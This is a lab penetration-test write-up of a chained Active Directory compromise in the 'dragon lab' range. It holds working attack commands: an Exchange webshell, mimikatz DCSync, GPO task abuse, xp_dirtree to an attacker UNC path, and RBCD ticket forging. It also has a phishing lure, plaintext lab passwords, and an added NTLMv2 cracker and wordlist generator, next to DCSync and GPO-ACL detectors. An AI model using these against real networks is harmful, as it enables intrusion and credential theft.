dragon lab writeup

Lab setup:

https://github.com/0range-x/dragon-lab

ws01 - OWA phishing

Scan results (screenshot)

Anonymous FTP upload is allowed (screenshot)

Build a username wordlist from the names collected (screenshot)

Brute-forced OWA with msf, using the generated username list and rockyou.txt as the password list; one pair succeeded.

Login succeeded (screenshots):

gaohexie/sweetpea#1

Craft the lure text:

Notice: please self-check for phishing backdoors

Hello. The company is currently running an attack-and-defence exercise, and the attacking side has been observed using phishing emails; several colleagues have already been compromised. Please download the backdoor detection tool and scan your machine for signs of lateral movement. Please also stay alert and guard against phishing attacks.

(screenshots of the phishing mail and the result)

ws02 - Exchange RCE

CVE-2021-26857 (screenshot)

Webshell written successfully (screenshot)

Execute commands through the webshell (JScript via ActiveXObject):

command=Response.Write(new%20ActiveXObject("Wscript.Shell").exec("whoami").Stdout.ReadAll());

(screenshot)

Serve the implant with a Python web server, download it on the target and get a callback (screenshots)

Callback received as SYSTEM (screenshot)

Locate the domain controller (screenshots)

Add-DomainObjectAcl -TargetIdentity "DC=haishitest,DC=lab" -PrincipalIdentity gaohexie -Rights DCSync

mimi.exe "lsadump::dcsync /domain:haishitest.lab /user:administrator /csv" exit

Import PowerView (screenshot)

Grant the ordinary user DCSync rights on the domain object (screenshot)

Log in over WinRM (screenshot)

Run the implant and get a callback (screenshot)

Dumped the password of liaide, who already holds DCSync rights, so run DCSync directly.
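On the defensive side, the ACL change above (replication rights granted to an ordinary user, then used with mimikatz) is exactly what DCSync detection has to catch. The following Python is an added example, not part of the writeup or of any tool it mentions: it scans Windows Security event 4662 records for the replication control-access rights and flags any subject that is not an expected replicator. The event records are constructed, and the expected-replicator set (only the DC machine account ws13$) is an assumption for this lab.

```python
"""Detect DCSync-style replication requests in Security event 4662.
Added example, not part of the writeup; the event records and the
expected-replicator set are constructed."""
import re

# Control-access rights a DC checks before answering a DRSGetNCChanges
# request; mimikatz lsadump::dcsync needs the first two.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts allowed to replicate.  Assumption for this lab: only the DC
# machine account (ws13).  Other DCs or Azure AD Connect would be added.
EXPECTED_REPLICATORS = {"HAISHI\\WS13$"}

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed 4662 records, reduced to the EventData fields that matter.
SAMPLE_EVENTS = [
    {   # normal: the DC itself replicates
        "EventID": 4662, "SubjectDomainName": "HAISHI", "SubjectUserName": "WS13$",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",   # domainDNS class
        "AccessMask": "0x100",                                      # control access
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # the lab's DCSync performed by a plain user
        "EventID": 4662, "SubjectDomainName": "HAISHI", "SubjectUserName": "gaohexie",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
        "AccessMask": "0x100",
        "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # unrelated access to a user object: must not alert
        "EventID": 4662, "SubjectDomainName": "HAISHI", "SubjectUserName": "gaohexie",
        "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",   # user class
        "AccessMask": "0x10",
        "Properties": "{00000000-0000-0000-0000-000000000000}",     # placeholder GUID
    },
]


def replication_rights_used(event):
    """Names of the replication rights referenced in the Properties field."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(event.get("Properties", ""))
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """One alert per 4662 event in which a non-replicator used a replication
    right.  Filtering on the subject, not the access mask alone, is what
    separates mimikatz from legitimate DC-to-DC replication."""
    allowed = {e.upper() for e in expected}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_used(ev)
        if not rights:
            continue
        subject = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if subject.upper() in allowed:
            continue
        alerts.append({"subject": subject, "rights": rights})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspected: {a['subject']} used {', '.join(a['rights'])}")
```

4662 is only written when "Audit Directory Service Access" is enabled and the domain head carries a SACL covering control-access rights; without that, the 5136 event for the nTSecurityDescriptor change made by Add-DomainObjectAcl is the remaining place to catch the grant itself.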

ws04 - AS-REP roasting

(screenshot)

User maluzi has Kerberos pre-authentication disabled, so it is AS-REP roastable

Build a password dictionary from personal habits with goPassGen:

https://github.com/bigb0sss/goPassGen

Generate the dictionary (screenshot)

Cracked the AS-REP hash (screenshot)
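The username list for the OWA brute force on ws01 and the habit-based password list for the AS-REP roast here both derive from the same input, the employee names. The following Python is an added example, not code from the writeup or from goPassGen, that generates both from constructed sample names and OSINT facts; the account formats, birth years, phone tails and suffix list are assumptions about typical habits, not data from the lab.

```python
"""Identity-derived wordlists for the OWA brute force (ws01) and the
AS-REP roast (ws04).  Added example, not from the writeup or goPassGen.
Names, years, phone tails and suffixes are constructed assumptions."""
from itertools import product

# Constructed sample input: romanised names, surname first, plus facts an
# attacker would collect from OSINT.  Hypothetical values.
EMPLOYEES = [
    {"name": ["gao", "he", "xie"], "year": 1990, "phone_tail": "6688"},
    {"name": ["ma", "lu", "zi"], "year": 1995, "phone_tail": "1234"},
]

# Assumed habit suffixes; extend this from any password already cracked.
COMMON_SUFFIXES = ["", "123", "1234", "@123", "!", "#1", "."]


def username_candidates(parts):
    """Common AD/OWA account formats for one person.

    parts: name tokens, surname first, e.g. ["gao", "he", "xie"].
    Returns the formats in priority order, de-duplicated.
    """
    surname, given = parts[0], "".join(parts[1:])
    given_initials = "".join(p[0] for p in parts[1:])
    all_initials = "".join(p[0] for p in parts)
    forms = [
        surname + given,            # gaohexie   (the format this lab uses)
        given + surname,            # hexiegao
        surname + "." + given,      # gao.hexie
        given + "." + surname,      # hexie.gao
        surname + given_initials,   # gaohx
        all_initials,               # ghx
        surname[0] + given,         # ghexie
        given[0] + surname,         # hgao
    ]
    return list(dict.fromkeys(forms))   # keeps order, drops duplicates


def password_candidates(emp):
    """Habit-based passwords: name fragment x (nothing | year | 2-digit
    year | phone tail) x common suffix, in a few capitalisations."""
    surname, given = emp["name"][0], "".join(emp["name"][1:])
    full = surname + given
    year = str(emp["year"])
    bases = [full, full.capitalize(), surname.capitalize() + given.capitalize(),
             surname, given, "".join(p[0] for p in emp["name"])]
    infixes = ["", year, year[2:], emp["phone_tail"]]
    cands = [b + i + s for b, i, s in product(bases, infixes, COMMON_SUFFIXES)]
    return list(dict.fromkeys(cands))


def build_wordlists(employees):
    """Return (usernames, passwords) for the whole target list, de-duplicated."""
    users, passwords = [], []
    for emp in employees:
        users += username_candidates(emp["name"])
        passwords += password_candidates(emp)
    return list(dict.fromkeys(users)), list(dict.fromkeys(passwords))


if __name__ == "__main__":
    users, pws = build_wordlists(EMPLOYEES)
    print(f"{len(users)} usernames, {len(pws)} passwords")
    print("\n".join(users))
```

Before spraying the password list against OWA or the KDC, read the domain lockout policy (threshold and observation window) and keep the number of attempts per account per window below it; a list this size will otherwise lock accounts and announce the attack.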

Logged in to ws04 (screenshot)

Found an Xmanager directory (screenshot)

Upload the decryption tool

Recovered the saved password (screenshot)

ws05 - service path privilege escalation + DPAPI decryption

Log in to the server over WinRM (screenshot)

First get a CS (Cobalt Strike) callback (screenshot)

Connect over RDP (3389) (screenshot)

Look for a service whose binary path can be abused for privilege escalation (screenshot)

Inspect the service (screenshot)

Stop the service (screenshot)

Modify the configuration file, start the service and get a callback (screenshots)

C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service

Privilege escalation succeeded (screenshot)

The CS session is unstable, so spawn a reverse shell to nc instead (screenshot)

Upload the decryption tool

Chrome browser credential decryption tool:

https://github.com/moonD4rk/HackBrowserData/releases/tag/v0.4.3

(screenshots)

Inject into a process running as administrator, since Chrome's saved credentials are DPAPI-protected under that user's context (screenshot)

Dump succeeded (screenshot)

Read the password (screenshot)

zhaolinlu:tEKO4f4CQ1BPPz~LQm

ws06-08 - mass callbacks via GPO

Check which GPOs the current user can write to with StandIn; the ACL listing shows that zhaolinlu has FullControl on the "work" GPO:
C:\Users\zhaolinlu\Desktop>StandIn_v13_Net45.exe --gpo --filter work --acl

[?] Using DC : ws13.haishi.lab
[+] GPO result count : 1
|_ Result limit : 50
|_ Applying search filter

[?] Object : CN={07D9CE42-10BD-436D-89AA-3B2EFAF47766}
Path : LDAP://CN={07D9CE42-10BD-436D-89AA-3B2EFAF47766},CN=Policies,CN=System,DC=haishi,DC=lab
GPCFilesysPath : \\haishi.lab\SysVol\haishi.lab\Policies\{07D9CE42-10BD-436D-89AA-3B2EFAF47766}
Path : OK

[+] Account : CREATOR OWNER
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly

[+] Account : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None

[+] Account : NT AUTHORITY\Authenticated Users
Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None

[+] Account : NT AUTHORITY\SYSTEM
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

[+] Account : HAISHI\Domain Admins
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

[+] Account : HAISHI\Enterprise Admins
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

[+] Account : HAISHI\zhaolinlu
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
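To triage a listing like the one above automatically, or to audit SYSVOL policy ACLs from the blue-team side, the following Python is an added example, not part of StandIn or the writeup: it parses the StandIn-style output and reports principals holding write-capable rights who are not among the default GPO writers. SAMPLE_LISTING is a trimmed copy of the listing above; the default-writer set is an assumption about a stock domain.

```python
"""Audit a StandIn --gpo --acl listing for principals who can modify a GPO.
Added example, not part of StandIn or the writeup; SAMPLE_LISTING is a
trimmed copy of the page's listing and DEFAULT_WRITERS is an assumption."""
import re

SAMPLE_LISTING = r"""
[?] Object : CN={07D9CE42-10BD-436D-89AA-3B2EFAF47766}
GPCFilesysPath : \\haishi.lab\SysVol\haishi.lab\Policies\{07D9CE42-10BD-436D-89AA-3B2EFAF47766}

[+] Account : CREATOR OWNER
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly

[+] Account : NT AUTHORITY\Authenticated Users
Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None

[+] Account : NT AUTHORITY\SYSTEM
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

[+] Account : HAISHI\Domain Admins
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

[+] Account : HAISHI\zhaolinlu
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
"""

# FileSystemRights names that let a principal change the policy files in
# SYSVOL, and therefore what every computer applying the GPO executes.
WRITE_RIGHTS = {"FullControl", "Modify", "Write", "WriteData", "CreateFiles",
                "AppendData", "CreateDirectories", "ChangePermissions",
                "TakeOwnership", "Delete"}

ACCOUNT_RE = re.compile(r"^\[\+\] Account : (.+)$")
FIELD_RE = re.compile(r"^([A-Za-z ]+?) : (.*)$")


def default_writers(netbios_domain):
    """Principals that hold write access on a freshly created GPO (assumed)."""
    return {"CREATOR OWNER", "NT AUTHORITY\\SYSTEM",
            f"{netbios_domain}\\Domain Admins", f"{netbios_domain}\\Enterprise Admins"}


def parse_listing(text):
    """Listing -> [{'Account': ..., 'Type': ..., 'Rights': [...], ...}]."""
    entries, current = [], None
    for line in text.splitlines():
        line = line.strip()
        m = ACCOUNT_RE.match(line)
        if m:
            current = {"Account": m.group(1).strip()}
            entries.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            key, value = m.group(1), m.group(2)
            current[key] = [r.strip() for r in value.split(",")] if key == "Rights" else value
    return entries


def unexpected_writers(entries, netbios_domain):
    """Accounts with an Allow ACE carrying a write right, minus the defaults."""
    ok = {a.upper() for a in default_writers(netbios_domain)}
    return [e["Account"] for e in entries
            if e.get("Type") == "Allow"
            and set(e.get("Rights", [])) & WRITE_RIGHTS
            and e["Account"].upper() not in ok]


if __name__ == "__main__":
    entries = parse_listing(SAMPLE_LISTING)
    print("unexpected GPO writers:", unexpected_writers(entries, "HAISHI"))
```

Anything this reports is a path to code execution on every computer the GPO is linked to, which is what the scheduled-task step that follows exploits.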

(screenshot)

Create a scheduled task through the GPO that adds zhaolinlu to the local Administrators group on every computer the GPO applies to:

StandIn_v13_Net45.exe --gpo  --filter work --tasktype computer --taskname task01 --author "haishi\Administrator" --command "powershell.exe /c" --args "net localgroup 'administrators' zhaolinlu /add"

Alternatively with PowerGPOAbuse:

https://github.com/rootSySdk/PowerGPOAbuse

Add-GPOGroupMember -Member 'zhaolinlu' -GPOIdentity 'work'

(screenshot)

In the same way, the MSSQL sa credentials were found on ws08 (screenshot)

sql01 - xp_dirtree NTLM hash capture

Login succeeded (screenshot)

Run xp_dirtree against an attacker-controlled UNC path so the SQL Server service account authenticates to our listener, and capture the Net-NTLM hash (screenshots):

EXEC master.sys.xp_dirtree '\\192.168.200.15\simblog.txt',0,1;

Captured the hash of the MSSQL service account (screenshot)

Cracked the password with the large rockyou.txt wordlist (screenshot)

wuxinqi:xxotisxx14.
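What the cracker actually does with a capture like this is simple enough to show end to end. The following Python is an added example, not from the writeup, Responder or hashcat: it computes the NTLMv2 proof from a candidate password (MD4 in pure Python, since hashlib often lacks md4 under OpenSSL 3; NTOWFv2 and NTProofStr per MS-NLMP) and runs a dictionary check against a hashcat 5600-format line. The server challenge, blob and candidate list are constructed; the user and password are the writeup's, and the NetBIOS domain HAISHI is taken from the GPO listing.

```python
"""Verify / crack a Net-NTLMv2 capture like the one xp_dirtree produced.
Added example, not from the writeup, Responder or hashcat.  Includes a
pure-Python MD4 because hashlib often lacks md4 under OpenSSL 3.  The
server challenge, blob and candidate list are constructed."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """RFC 1320 MD4 digest of data (bytes)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (range(16), (3, 7, 11, 19), 0x00000000, f),
        ((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999, g),
        ((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1, h),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for order, shifts, k, fn in rounds:
            for i, idx in enumerate(order):
                # one step; rotating the registers yields the ABCD/DABC/CDAB/BCDA pattern
                a, b, c, d = d, _rol((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    return md4(password.encode("utf-16le"))


def ntowf_v2(password, user, domain):
    # MS-NLMP 3.3.2: HMAC_MD5(NTHash, UNICODE(Uppercase(User) + UserDom))
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge, blob):
    # NTProofStr = HMAC_MD5(ResponseKeyNT, ServerChallenge + temp)
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def hashcat_line(user, domain, password, server_challenge, blob):
    """Render a capture the way Responder writes it (hashcat -m 5600)."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line, candidates):
    """Dictionary attack on one 5600-format line; returns the password or None."""
    user, _, domain, chal, proof, blob = line.split(":", 5)
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for pw in candidates:
        if hmac.compare_digest(nt_proof(pw, user, domain, chal, blob), proof):
            return pw
    return None


# Constructed capture.  NTLMv2 blob: RespType/HiRespType/reserved, timestamp,
# client challenge, reserved, one AV pair (MsvAvNbDomainName), MsvAvEOL, trailer.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = (bytes.fromhex("0101000000000000") + bytes.fromhex("00d0d9a2b1c47fd8")
               + bytes.fromhex("a1b2c3d4e5f60718") + bytes.fromhex("00000000")
               + b"\x02\x00\x0c\x00" + "HAISHI".encode("utf-16le")
               + b"\x00\x00\x00\x00" + b"\x00\x00\x00\x00")
SAMPLE_LINE = hashcat_line("wuxinqi", "HAISHI", "xxotisxx14.", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, ["123456", "password", "xxotisxx14."]))
```

The only secret-dependent value in the line is the 16-byte NTProofStr; everything else (challenge, blob) is sent in clear, which is why a captured exchange can be attacked offline and why the service account's password, not the protocol, is the weak point here.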

sql02 - TeamViewer takeover

Logged in over RDP (3389) (screenshot)

TeamViewer is installed on this machine and has an active connection to 192.168.201.100 (screenshot)

and the password is saved on the desktop (screenshot)

Connected (screenshot)

ws09 - Constrained Language Mode restrictions

cmd is disabled (screenshot)

Many commands are blocked (screenshot)

PowerShell is set to ConstrainedLanguage mode (screenshot)

Executables cannot be run from the current directory either (exe execution is restricted by directory), so switch to an allow-listed directory.

CLM bypass:

https://hackmd.io/@0xbc000/B1pNFIuP_

Found the user that can configure RBCD (screenshots)

husungeng:X9NNkYTMp9jA2vKHXXI

ws12 - take over Exchange via RBCD

Create a machine account and configure resource-based constrained delegation to ws12 (msDS-AllowedToActOnBehalfOfOtherIdentity):

SharpAllowedToAct.exe -m husungeng -p X9NNkYTMp9jA2vKHXXI -t ws12 -a 192.168.200.2 haishi.lab

Request a service ticket for cifs/ws12.haishi.lab impersonating administrator (S4U2Self + S4U2Proxy):

python getST.py -dc-ip 192.168.200.2 haishi/husungeng:X9NNkYTMp9jA2vKHXXI -spn cifs/ws12.haishi.lab -impersonate administrator

Load the ticket:

export KRB5CCNAME=administrator.ccache

Get a shell:

python3 smbexec.py -no-pass -k ws12.haishi.lab

(screenshot)
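The attribute that SharpAllowedToAct writes on ws12 is a binary security descriptor whose DACL names the accounts allowed to delegate to the host. The following Python is an added example, not code from the writeup, SharpAllowedToAct or impacket: it builds that descriptor for a list of SIDs and parses one back, which is also what a defender reads from msDS-AllowedToActOnBehalfOfOtherIdentity when checking who may impersonate users to a computer. Struct layouts follow MS-DTYP; the machine-account SID is constructed, and the owner SID and full-control mask mirror what impacket's rbcd.py uses (an assumption about that tool's choice, not a protocol requirement).

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity security
descriptor that RBCD tooling writes on the target computer object.
Added example, not from the writeup or the tools it uses; layouts follow
MS-DTYP, the SIDs below are constructed."""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 0x02                        # plain (non-object) ACEs only
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
FULL_CONTROL = 0x000F01FF                  # mask rbcd tools grant (983551)
OWNER_SID = "S-1-5-32-544"                 # BUILTIN\Administrators (assumed, as impacket does)


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID: revision, count, 48-bit BE authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"bad SID {sid!r}")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off=0):
    """Binary SID at buf[off:] -> (string form, bytes consumed)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs))), 8 + 4 * count


def build_rbcd_sd(allowed_sids):
    """Self-relative SECURITY_DESCRIPTOR whose DACL allows FULL_CONTROL to
    each SID; each SID is a computer account permitted to perform
    S4U2Proxy against this host."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header (type, flags, size) + access mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    dacl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(OWNER_SID)
    off_owner = 20                       # header size
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)    # group SID == owner SID here
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + owner + dacl


def parse_rbcd_sd(sd):
    """[(sid, mask)] for every ACCESS_ALLOWED ACE in the DACL: the accounts
    that may delegate to the computer carrying this attribute."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, out = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((bytes_to_sid(sd, pos + 8)[0], mask))
        pos += ace_size
    return out


if __name__ == "__main__":
    # Constructed SID for the attacker-created machine account.
    sd = build_rbcd_sd(["S-1-5-21-1111111111-2222222222-3333333333-1105"])
    print(sd.hex())
    print(parse_rbcd_sd(sd))
```

Written to the computer object with an LDAP replace of msDS-AllowedToActOnBehalfOfOtherIdentity, this is the whole precondition for the getST step above; on the audit side, any SID in this DACL that is not a known, intended front-end service account is a standing path to impersonating administrator on that host.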

ws13 - DC